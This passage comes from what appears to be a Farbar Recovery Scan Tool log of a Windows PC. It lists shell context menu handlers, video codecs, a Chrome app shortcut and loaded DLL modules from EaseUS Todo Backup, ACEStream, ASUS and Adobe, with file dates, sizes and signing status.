Development Co.,Ltd) [File not signed] ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-11-15] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed] ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2019-10-24] (Google LLC -> Google) ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\ProgramData\MEGAsync\ShellExtX64.dll [2019-09-16] (Mega Limited -> ) ContextMenuHandlers4: [SimpleShlExt] -> {45203D3B-3D73-4497-8AFE-D29950AC6C55} => C:\Program Files (x86)\EaseUS\Todo Backup\bin\x64\ImageSh.dll [2018-08-14] (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co.,Ltd) [File not signed] ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-30] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2017-03-09] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed] ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems, Incorporated -> Adobe Systems Inc.) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-11-15] (Malwarebytes Corporation -> Malwarebytes) ==================== Codecs (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Drivers32: [VIDC.X264] => C:\WINDOWS\system32\x264vfw64.dll [3799552 2017-07-30] (x264vfw project) [File not signed] HKLM\...\Drivers32: [VIDC.LAGS] => C:\WINDOWS\system32\lagarith.dll [148992 2011-12-07] ( ) [File not signed] HKLM\...\Drivers32: [VIDC.XVID] => C:\WINDOWS\system32\xvidvfw.dll [311296 2018-01-28] () [File not signed] HKLM\...\Drivers32: [msacm.ac3acm] => C:\WINDOWS\system32\ac3acm.acm [180736 2012-07-21] (fccHandler) [File not signed] HKLM\...\Drivers32: [VIDC.X264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [File not signed] HKLM\...\Drivers32: [VIDC.LAGS] => C:\Windows\SysWOW64\lagarith.dll [216064 2011-12-07] ( ) [File not signed] HKLM\...\Drivers32: [VIDC.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [284672 2018-01-28] () [File not signed] HKLM\...\Drivers32: [VIDC.FFDS] => C:\Windows\SysWOW64\ff_vfw.dll [112128 2015-10-24] () [File not signed] HKLM\...\Drivers32: [msacm.ac3acm] => C:\Windows\SysWOW64\ac3acm.acm [122880 2012-07-21] (fccHandler) [File not signed] ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\Luis M\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\vGet Cast (DLNA Controller).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=ekdjofnchpbfmnfbedalmbdlhbabiapi ==================== Loaded Modules (Whitelisted) ============= 2019-10-16 21:27 - 2019-10-16 21:27 - 000010240 _____ () [File not signed] C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\locale\es_es\acrotray.esp 2019-10-16 21:27 - 2019-10-16 21:27 - 000163328 _____ () [File not signed] C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Locale\es_es\PDFMaker\PDFMOfficeAddin.ESP 2018-09-20 07:32 - 2018-09-20 07:32 - 000048128 _____ () [File not signed] C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Locale\es_es\PDFMaker\PDFMOutlookAddin.ESP 2018-09-11 19:16 - 2010-06-29 09:58 - 000104448 _____ () [File not signed] C:\Program Files (x86)\ASUS\AXSP\1.00.18\ATKEX.dll 2019-11-18 19:14 - 2019-11-18 19:14 - 000022528 _____ () [File not signed] C:\Program Files (x86)\ASUS\AXSP\1.00.18\PEbiosinterface32.dll 2019-05-16 20:09 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll 2019-05-16 20:09 - 2017-03-23 08:49 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll 2018-09-16 20:40 - 2016-03-07 17:08 - 001291264 _____ () [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll 2018-09-16 20:40 - 2004-10-05 02:08 - 000055808 _____ () [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000053248 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_blist.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000091648 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_ctypes.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000136704 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_elementtree.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 001016832 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_hashlib.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000027648 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_multiprocessing.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000036352 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_psutil_mswindows.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000046592 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_socket.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000050688 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_sqlite3.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 001410048 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\_ssl.pyd 2018-08-23 11:23 - 2018-08-23 11:23 - 000372736 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\acestreamengine.Core.pyd 2018-08-23 11:23 - 2018-08-23 11:23 - 005892096 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\acestreamengine.CoreApp.pyd 2018-08-23 11:23 - 2018-08-23 11:23 - 000318976 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\acestreamengine.jsplayer.pyd 2018-08-23 11:23 - 2018-08-23 11:23 - 003552768 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\acestreamengine.live.pyd 2018-08-23 11:23 - 2018-08-23 11:23 - 000018944 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\acestreamengine.pycompat.pyd 2018-08-23 11:23 - 2018-08-23 11:23 - 000273000 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\acestreamengine.pysegmenter.pyd 2018-08-23 11:23 - 2018-08-23 11:23 - 000350720 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\acestreamengine.pyvlc.pyd 2018-08-23 11:23 - 2018-08-23 11:23 - 002386432 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\acestreamengine.pywebrtc.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000723968 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\apsw.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000040448 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\bitarray._bitarray.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000066048 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\cpyamf.amf0.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000082944 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\cpyamf.util.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000031232 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\Crypto.Cipher.AES.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000112142 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\libgcc_s_dw2-1.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 002977792 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\lxml.etree.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000334336 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\M2Crypto.__m2crypto.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000061952 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\miniupnpc.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000014848 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\netifaces.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000136704 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\pyexpat.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000358912 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\pythoncom27.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000110080 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\pywintypes27.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000010240 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\select.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000551424 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\sqlite3.dll 2018-06-22 08:41 - 2018-06-22 08:41 - 000687104 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\unicodedata.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000098816 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\win32api.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000111616 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\win32file.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000167424 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\win32gui.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000024064 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\win32pdh.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000035840 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\win32process.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000966144 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wx._controls_.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000981504 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wx._core_.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000746496 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wx._gdi_.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000674816 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wx._misc_.pyd 2018-06-22 08:41 - 2018-06-22 08:41 - 000670720 _____ () [File not signed] C:\Users\Luis M\AppData\Roaming\ACEStream\engine\lib\wx._windows_.pyd 2015-03-17 01:34 - 2015-03-17 01:34 - 000013824 _____ (Adobe Systems Inc.) [File not signed] C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\locale\es_es\Acrobat Elements\ContextMenuShim64.esp 2018-09-11 19:16 - 2010-11-30 17:40 - 000108544 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsAcpi.dll 2018-09-11 19:19 - 2010-10-26 17:54 - 000108544 _____ (ASUS) [File not signed] C:\Program Files (x86)\ASUS\AsusFanControlService\1.00.06\AsAcpi.dll 2018-09-11 19:16 - 2010-11-22 14:56 - 000677888 _____ (ASUSTeK Computer Inc.) [File not signed] C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\asacpiEx.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000026768 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000058000 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\ActivationOnline.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000021648 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\ActiveOnline.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000264336 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\AuthorizedMng.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000089232 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\BootDriver.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000112272 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CalcScheduleTime.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000026256 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CallbackOperator.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000074384 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CheckImg.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000078992 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CloudOperator.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000195728 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CMCAdapt.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000163472 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CMCAdapt_RTTO.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000018064 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CMCNetTokenProxy.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000188560 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CMCPipeCenter.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000024720 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CmcTbProxy.dll 2018-09-16 20:40 - 2017-02-21 16:19 - 000083136 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000091792 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\Common.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000019600 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CompressFile.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000024720 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CorrectMbr.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000142992 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\Device.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000029328 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\DeviceAdapter.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000367760 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\DeviceManager.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000032912 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\DiskSearchImg.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000539280 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\DsImgFile.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000266384 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\EmailBackupSize.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000292496 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\EmailBrowser.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000162960 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumDisk.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000034448 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000704144 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuActiveOnline.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000487568 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\EULicenseDLL.DLL 2018-09-16 20:39 - 2018-08-14 08:39 - 002458768 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000064144 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FATFileSystemAnalyser.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000078480 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FatLib.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000119952 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FileSearch.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000131216 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FileStorage.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000052368 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FileSystemAnalyser.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000021648 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\fsclog.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000026768 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\GetDriverInfo.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000169616 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\ImgFile.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000085648 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\logsys.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000070800 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\MountImg.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000072848 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\NasOperator.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000058512 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\NTFSFileSystemAnalyser.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000211088 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\NTFSLib.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000318608 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\NTFSUtil.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000149136 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\Partition.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000066192 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\RegLib.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000220304 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\SmartBackup.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000075408 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\SqlExBrowser.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000585872 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\SqlSMOCPlusPlus.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000045200 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbDataSwap.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000055952 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBInfo.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000054416 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000141968 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\vhdvmdk.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000138384 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> ) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\VMConfig.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000729744 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\CmdManager.dll 2018-09-16 20:39 - 2018-08-14 08:38 - 000022160 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\ControlPxe.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000731792 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\EMail.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000046736 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuPipe.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000235152 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FlBackup.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000103056 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FlBackupSize.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000599696 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FlImgFile.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000046224 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FlSearchImg.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000161424 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\Ftp.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000019600 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\FTPTest.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000120976 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\ImageFileInfo.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000264336 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\ImgFileHlp.dll 2018-09-16 20:39 - 2018-08-14 08:39 - 000153232 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\MatchStr.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000028816 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\Options.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000095376 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\PolicyManage.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000124048 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\Thread.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000113296 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\Transmit.dll 2018-09-16 20:39 - 2018-08-14 08:40 - 000044688 _____ (CHENGDU YIWO Tech Development Co., Ltd. -> CHENGDU YIWO Tech Development Co., Ltd) [File not signed] C:\Program Files (x86)\EaseUS\Todo Backup\bin\XmlWrapper.dll 2018-09-16 